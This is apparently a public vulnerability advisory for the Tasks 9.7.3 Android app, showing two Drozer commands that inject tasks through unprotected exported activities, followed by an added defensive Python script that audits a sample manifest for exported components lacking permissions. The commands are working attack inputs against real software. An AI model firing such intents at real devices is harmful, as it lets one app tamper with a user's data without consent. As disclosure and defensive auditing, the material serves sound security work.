# Exploit Title: Tasks 9.7.3 - Insecure Permissions
# Date: 18th of July, 2020
# Exploit Author: Lyhin's Lab
# Detailed Bug Description: https://lyhinslab.org/index.php/2020/07/18/how-the-white-box-hacking-works-ok-google-i-wanna-pwn-this-app/
# Vendor Homepage: https://tasks.org/
# Software Link: https://github.com/tasks/tasks
# Version: 9.7.3
# Tested on: Android 9

Any application installed on a victim's phone can add arbitrary tasks to the user's task list through insecure IPC handling.
A malicious application can achieve this in several ways:

1. By sending multiple intents to the ShareLink activity (com/todoroo/astrid/activity/ShareLinkActivity.java). The Tasks application adds the first requested "task" to the user's task list.

2. By sending an intent to the VoiceCommand activity (org/tasks/voice/VoiceCommandActivity.java). The application does not validate the intent's origin, so any application can append tasks to the user's task list.

We used the Drozer application to emulate malicious app activity. Please find the commands below.

run app.activity.start --component org.tasks.debug com.todoroo.astrid.activity.ShareLinkActivity --action=android.intent.action.PROCESS_TEXT --extra string android.intent.extra.PROCESS_TEXT "Kill Mufasa"

run app.activity.start --component org.tasks.debug org.tasks.voice.VoiceCommandActivity --action=com.google.android.gm.action.AUTO_SEND --extra string android.intent.extra.TEXT "Visit https://lyhinslab.org"
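
A defender-side check for the exposure described above, as an added example that is not part of the original advisory or the Tasks project: it audits a decoded AndroidManifest.xml for exported components that any installed app can start because no android:permission guards them. The manifest below is constructed for illustration (it reuses the two activity names and intent actions from this advisory; the org.example entries are hypothetical), and the default-export rule applied is the one for apps targeting below API 31.

```python
import xml.etree.ElementTree as ET

ANDROID = "{http://schemas.android.com/apk/res/android}"

# Constructed manifest for illustration; NOT the real Tasks manifest.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="org.tasks.debug">
  <application>
    <activity android:name="com.todoroo.astrid.activity.ShareLinkActivity">
      <intent-filter><action android:name="android.intent.action.PROCESS_TEXT"/></intent-filter>
    </activity>
    <activity android:name="org.tasks.voice.VoiceCommandActivity" android:exported="true">
      <intent-filter><action android:name="com.google.android.gm.action.AUTO_SEND"/></intent-filter>
    </activity>
    <activity android:name="org.example.InternalActivity" android:exported="false"/>
    <activity android:name="org.example.GuardedActivity" android:exported="true"
              android:permission="org.example.permission.ADD_TASK"/>
  </application>
</manifest>"""


def is_exported(component):
    """Explicit android:exported wins; otherwise, before API 31, a component
    with at least one intent-filter is exported by default."""
    explicit = component.get(ANDROID + "exported")
    if explicit is not None:
        return explicit.lower() == "true"
    return component.find("intent-filter") is not None


def unguarded_components(manifest_xml):
    """Return (tag, name, actions) for exported components that declare no
    android:permission, i.e. components any installed app can invoke."""
    app = ET.fromstring(manifest_xml).find("application")
    app_perm = app.get(ANDROID + "permission")  # applies to every component
    findings = []
    for tag in ("activity", "activity-alias", "service", "receiver"):
        for comp in app.iter(tag):
            if is_exported(comp) and not (comp.get(ANDROID + "permission") or app_perm):
                actions = sorted(a.get(ANDROID + "name") for a in comp.iter("action"))
                findings.append((tag, comp.get(ANDROID + "name"), actions))
    return findings


if __name__ == "__main__":
    for tag, name, actions in unguarded_components(SAMPLE_MANIFEST):
        print(f"[!] exported {tag} without permission: {name} {actions}")
```

Each finding is a component whose handler must treat incoming intent extras as untrusted input, or be restricted with android:exported="false" or a signature-level permission.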